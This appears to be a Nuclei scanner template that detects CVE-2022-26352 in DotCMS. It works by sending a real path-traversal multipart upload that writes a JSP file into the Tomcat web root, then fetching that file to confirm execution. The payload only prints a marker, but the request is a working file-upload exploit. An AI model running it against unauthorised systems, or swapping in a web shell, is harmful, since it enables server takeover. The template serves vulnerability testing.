id: CVE-2022-26352

info:
  name: DotCMS Arbitrary File Upload
  author: h1ei1
  severity: critical
  description: There is an arbitrary file upload vulnerability in the /api/content/ path of the DotCMS management system, and attackers can upload malicious Trojans to obtain server permissions.
  reference:
    - https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/
    - https://github.com/h1ei1/POC/tree/main/CVE-2022-26352
  classification:
    cve-id: CVE-2022-26352
  tags: cve,cve2022,rce,dotcms

requests:
  - raw:
      - |
        POST /api/content/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=------------------------aadc326f7ae3eac3

        --------------------------aadc326f7ae3eac3
        Content-Disposition: form-data; name="name"; filename="../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/{{randstr}}.jsp"
        Content-Type: text/plain

        <%
        out.println("CVE-2022-26352");
        %>
        --------------------------aadc326f7ae3eac3--

      - |
        GET /{{randstr}}.jsp HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "CVE-2022-26352")'
          - 'status_code_2 == 200'
        condition: and